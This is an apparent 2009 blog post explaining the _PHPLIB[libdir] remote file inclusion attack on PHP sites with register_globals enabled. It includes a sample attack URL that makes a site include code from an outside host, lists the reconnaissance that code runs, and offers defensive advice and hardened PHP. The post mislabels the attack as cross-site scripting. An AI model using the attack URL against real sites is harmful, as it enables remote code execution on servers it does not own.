
_PHPLIB[libdir] Cross Site Scripting Exploit Explained

Posted: Tuesday, July 21st, 2009 at 8:41 pm
Updated: Sunday, September 6th, 2009 at 2:24 am

Lately, I’ve seen an increasing number of attempts by bad people to run an XSS exploit against this website using the _PHPLIB[libdir] exploit. It alarmed me a bit, as I didn’t really know about that particular exploit. Obviously I wanted to make sure that my site is not vulnerable to it, so I did a little digging.

For WordPress users, you may also be interested in my other article on Updating wp-ban to include bad URLs.

What is the _PHPLIB[libdir] exploit?

It turned out that the _PHPLIB[libdir] exploit is very old; I’ve seen reports of it dating back to 2001. One thing I need to say is that _PHPLIB is not one of the standard variables PHP provides. It is a variable some software uses. Such software would define the variable $_PHPLIB somewhere in a settings or configuration file and then include its libraries with something like the following:

require($_PHPLIB["libdir"] . "db_mysql.inc");

On servers or PHP installations where register_globals is set to on, it may be possible to override that value with whatever the user passes in the request. For example, if your $_PHPLIB[“libdir”] variable is originally set to /home/john/public_html/lib/ then, assuming you have PHP code like the above, you’ll be including /home/john/public_html/lib/db_mysql.inc.

Now suppose someone accesses your website with a URL like the one below:
http://www.john.com/~john/index.php?_PHPLIB[libdir]=http://www.auctions4profit.info/uploaded/cache/id???????

If your $_PHPLIB[“libdir”] value is changed to whatever the bad person specifies in the URL parameter, what happens is that you’ll be including a foreign file, and that file would be executed within your website as if it were hosted on your server. In short, it is as if your code above had been changed to:

require("http://www.auctions4profit.info/uploaded/cache/id???????db_mysql.inc");

So what are they trying to run?

I’ve checked a few of the scripts they were actually trying to run on my server. There are slight variations between them. In general, a script runs some PHP commands to gather information about your server:

  • Whether your PHP safe mode is on or off.
  • Runs the php_uname() function to gather information about your operating system. This has the same effect as running uname -a from your Unix / Linux shell prompt.
  • Finds out your system’s uptime.
  • Finds out the web server’s user account. Most people have this as nobody, or www-data on Ubuntu.
  • Gets the directory location of your web server root by running the getcwd() function.
  • Finds out your PHP version by running the phpversion() function.
  • Finds out your web server software, server hostname, and server IP address. Apache and lighttpd are popular ones, I believe.
  • Finally, it prints information about your hard disk, such as total size, used and free space.

Oh my! What can I do to protect myself?

Well, given that the exploit is very old, chances are you’re pretty safe. Do follow the security best practices outlined in the PHP manual. I also found this blog entry to be very useful.

Another thing is to keep your software up to date. This includes PHP, your operating system and the software you use (Drupal / Joomla / WordPress / etc). PHP has gone a long way since 2001 to increase security.

In addition to all the best practices, you may also want to install Suhosin from the Hardened PHP Project. The good news is that Ubuntu’s PHP installation already comes with it.
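To show the difference between the fragile include pattern above and a version that cannot be redirected by a request parameter, here is an added example (my own code, not the original post’s and not from any PHPLIB-based project). The library path /home/john/public_html/lib/, the file name db_mysql.inc and the helper name safe_lib_include() are assumptions for illustration.

```php
<?php
// Added example, not from the original post. Paths and names are hypothetical.

// FRAGILE (the pattern described in the post): with register_globals=On, a
// request such as ?_PHPLIB[libdir]=http://attacker.example/ populates $_PHPLIB
// before this line runs, so require() fetches and executes a remote file.
//   require($_PHPLIB["libdir"] . "db_mysql.inc");

// HARDENED: take the library directory from a constant defined in this file,
// never from request data, and verify the resolved path before including it.
define('PHPLIB_LIBDIR', '/home/john/public_html/lib/');   // assumed location

function safe_lib_include(string $name): string
{
    // Only plain file names are accepted: no slashes, no "..", no URL scheme.
    if (!preg_match('/^[A-Za-z0-9_]+\.inc$/', $name)) {
        throw new InvalidArgumentException("Rejected library name: $name");
    }
    $base = realpath(PHPLIB_LIBDIR);
    $path = realpath(PHPLIB_LIBDIR . $name);
    // realpath() returns false for URLs and missing files; the prefix check
    // rejects anything that resolves outside the library directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("Refusing to include $name from outside " . PHPLIB_LIBDIR);
    }
    return $path;
}

// Overwrite whatever register_globals may have injected, unconditionally,
// so later code that still reads $_PHPLIB["libdir"] sees only our value.
$_PHPLIB = array('libdir' => PHPLIB_LIBDIR);

// Refuse to run at all if the settings that make this attack possible are on.
if (ini_get('register_globals') || ini_get('allow_url_include')) {
    error_log('Insecure PHP configuration: register_globals or allow_url_include is on');
    http_response_code(500);
    exit;
}

require safe_lib_include('db_mysql.inc');
```

The ini check matters on the PHP versions in use when this was written; on PHP 5.4 and later register_globals no longer exists, and ini_get() simply returns false for it.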

Also, keep your password secure. Don’t set your password as password. Keep backup and audit your system periodically.

Thank you for reading this article. I hope you enjoyed it. Please leave comments, suggestions or questions if you have any. I’m looking forward to improving my solution with your feedback.
